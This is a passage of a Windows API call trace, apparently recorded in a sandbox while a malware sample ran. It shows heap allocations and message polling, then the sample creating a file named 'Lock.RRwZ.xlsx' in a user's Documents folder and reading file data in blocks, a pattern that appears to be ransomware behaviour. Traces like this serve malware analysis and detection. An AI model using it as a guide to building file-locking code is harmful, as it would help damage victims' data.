hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0220.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0220.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0220.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0220.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0220.292] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0220.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0220.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854470 [0220.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.292] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0220.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854470 | out: hHeap=0x2af0000) returned 1 [0220.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0220.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0220.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0220.293] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.RRwZ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.rrwz.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0220.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0220.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0220.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0220.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0220.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0220.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0220.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0220.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0220.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0220.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0220.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0220.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0220.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0220.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0220.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54ef020 [0220.299] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0220.299] ReadFile (in: hFile=0x524, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0220.301] ReadFile (in: hFile=0x524, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x3fe5, lpOverlapped=0x0) returned 1 [0220.302] ReadFile (in: hFile=0x524, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0220.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13fe5) returned 0x2a8a138 [0220.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54ef020 | out: hHeap=0x2af0000) returned 1 [0220.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0220.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0220.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13fe5) returned 0x2aae878 [0220.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0220.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.308] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0220.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0220.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13fe5) returned 0x2a8a138 [0220.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0220.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0220.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.308] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0220.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0220.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0220.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0220.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0220.309] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0220.309] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0220.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0220.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a78 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13fe5) returned 0x2a8a138 [0220.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0220.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0220.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0220.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0220.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaee8 [0220.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0220.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0220.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0220.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0220.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13fe5) returned 0x2ac2868 [0220.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0220.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0220.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0220.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0220.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0220.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0220.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0220.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0220.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0220.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0220.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0220.312] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0220.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0220.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0220.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0220.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0220.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0220.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0220.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: 